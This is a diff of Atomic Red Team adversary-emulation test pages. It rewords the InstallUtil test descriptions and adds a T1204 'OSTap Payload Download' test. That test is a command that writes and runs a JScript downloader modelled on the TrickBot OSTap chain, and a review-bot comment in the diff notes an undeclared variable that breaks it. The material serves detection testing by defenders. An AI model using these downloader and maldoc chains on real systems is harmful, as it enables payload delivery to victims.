-Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil.
+Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed.
+If no output is displayed the test executed successfuly.
**Supported Platforms:** Windows
@@ -101,7 +102,8 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - InstallHelper method call
-Executes the InstallHelper class constructor runner instead of executing InstallUtil.
+Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test
+executed successfuly.
**Supported Platforms:** Windows
@@ -178,7 +180,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - InstallUtil class constructor method call
-Executes the installer assembly class constructor.
+Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility.
**Supported Platforms:** Windows
@@ -255,7 +257,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - InstallUtil Install method call
-Executes the Install Method
+Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility.
**Supported Platforms:** Windows
@@ -332,7 +334,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - InstallUtil Uninstall method call - /U variant
-Executes the Uninstall Method
+Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility.
**Supported Platforms:** Windows
@@ -409,7 +411,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #6 - InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant
-Executes the Uninstall Method
+Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility.
**Supported Platforms:** Windows
@@ -486,7 +488,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #7 - InstallUtil HelpText method call
-Executes the Uninstall Method
+Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil.
**Supported Platforms:** Windows
@@ -563,7 +565,8 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #8 - InstallUtil evasive invocation
-Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly.
+Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation."
+will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion.
**Supported Platforms:** Windows
diff --git a/atomics/T1204/T1204.md b/atomics/T1204/T1204.md
index 7b7158ac..c34afee9 100644
--- a/atomics/T1204/T1204.md
+++ b/atomics/T1204/T1204.md
@@ -10,9 +10,11 @@ While User Execution frequently occurs shortly after Initial Access it may occur
- [Atomic Test #1 - OSTap Style Macro Execution](#atomic-test-1---ostap-style-macro-execution)
-- [Atomic Test #2 - Maldoc choice flags command execution](#atomic-test-2---maldoc-choice-flags-command-execution)
+- [Atomic Test #2 - OSTap Payload Download](#atomic-test-2---ostap-payload-download)
-- [Atomic Test #3 - OSTAP JS version](#atomic-test-3---ostap-js-version)
+- [Atomic Test #3 - Maldoc choice flags command execution](#atomic-test-3---maldoc-choice-flags-command-execution)
+
+- [Atomic Test #4 - OSTAP JS version](#atomic-test-4---ostap-js-version)
@@ -21,7 +23,7 @@ While User Execution frequently occurs shortly after Initial Access it may occur
This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. The .jse file in turn launches wscript.exe.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
-This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
+This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
References:
https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
@@ -73,7 +75,42 @@ Stop-Process -Name WINWORD
-## Atomic Test #2 - Maldoc choice flags command execution
+## Atomic Test #2 - OSTap Payload Download
+Uses cscript //E:jscript to download a file
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js|
+| file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
+cscript //E:Jscript #{script_file}
+```
+
+#### Cleanup Commands:
+```cmd
+del #{script_file} /F /Q >nul 2>&1
+```
+
+
+
+
+
+
+
+
+## Atomic Test #3 - Maldoc choice flags command execution
This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
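Review bot: The JScript written by the `echo` line in the Attack Commands references `filename` in `stream.SaveToFile(filename, 1)`, but the only declared variables are `url`, `fso`, `request` and `stream`, so at runtime cscript raises an undefined-variable error and nothing is saved; the test can never exercise the file-write step it is meant to produce for detection purposes. This is the same block removed from the T1071 page earlier in this diff, so the defect predates the move, but relocating it is a good moment to fix it, e.g. by adding an input for the destination and declaring it up front: `var url = "#{file_url}", filename = "#{output_file}", fso = ...` (where `output_file` is a new input to be added to the Inputs table; name is a placeholder). The `fso` object is also created but never used and could be dropped. If this .md is generated from the T1204 YAML, the fix belongs in the YAML source rather than here.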
@@ -123,8 +160,8 @@ Stop-Process -Name WINWORD
-## Atomic Test #3 - OSTAP JS version
-Malicious JavaScript executing CMD which spaws wscript.exe //e:jscript
+## Atomic Test #4 - OSTAP JS version
+Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
**Supported Platforms:** Windows